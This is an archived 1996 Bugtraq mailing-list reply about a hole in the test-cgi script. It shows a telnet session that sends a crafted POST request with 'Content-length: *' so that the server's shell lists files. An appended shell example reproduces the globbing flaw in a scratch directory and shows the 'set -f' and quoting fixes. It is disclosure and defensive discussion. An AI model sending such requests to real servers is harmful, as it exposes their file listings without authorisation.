Bugtraq mailing list archives
Re: Vulnerability in test-cgi
From: esi () ptc spbu ru (Evgene Ilyine)
Date: Tue, 17 Dec 1996 12:24:32 +0300
On Tue, 3 Dec 1996, Joe Zbiciak wrote:
> string. Therefore it's still vulnerable in its default configuration. Adding "set -f" as the second line of the script closes the hole completely.
Yes -- otherwise this hole would look like a virus, here is another mutation:

<esi@snark:~> (268) telnet localhost 80
Trying 127.0.0.1...
Connected to localhost.
Escape character is '^]'.
post /cgi-bin/nph-test-cgi http/1.0
Content-type: x
Content-length: *
.. skipped
CONTENT_LENGTH = ( here you'll get a list of files)

=============================================================
postmaster () spbu ru Evgene Ilyine
http://www.ptc.spbu.ru/~esi Work phone:428-4527
=============================================================
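The behaviour discussed in this thread, reproduced in a scratch directory as an added example (not code from the post or from test-cgi itself). The echo line is modelled on the CONTENT_LENGTH output in the session above; the function names, the constructed file names and the quoted variant are assumptions.

```shell
#!/bin/sh
# Added example: constructed reproduction of unquoted expansion of a
# client-supplied header value. All names here are hypothetical.

# Build a scratch directory holding two constructed files; print its path.
make_sandbox() {
    dir=$(mktemp -d) || return 1
    : > "$dir/alpha.txt"
    : > "$dir/beta.log"
    printf '%s\n' "$dir"
}

# Vulnerable form: the value is expanded unquoted, so the shell performs
# pathname expansion on "*" before echo ever sees it.
report_unquoted() (
    cd "$1" || exit 1
    CONTENT_LENGTH=$2
    echo CONTENT_LENGTH = $CONTENT_LENGTH
)

# Fix named in the thread: "set -f" turns pathname expansion off.
report_noglob() (
    set -f
    cd "$1" || exit 1
    CONTENT_LENGTH=$2
    echo CONTENT_LENGTH = $CONTENT_LENGTH
)

# Variant not from the thread: quoting passes the value through literally.
report_quoted() (
    cd "$1" || exit 1
    CONTENT_LENGTH=$2
    echo "CONTENT_LENGTH = $CONTENT_LENGTH"
)

# Print all three results for the same input, then clean up.
demo() {
    sandbox=$(make_sandbox) || return 1
    report_unquoted "$sandbox" '*'
    report_noglob "$sandbox" '*'
    report_quoted "$sandbox" '*'
    rm -rf "$sandbox"
}

demo
```

Only the first line of output lists the directory contents; the other two print the literal `*`.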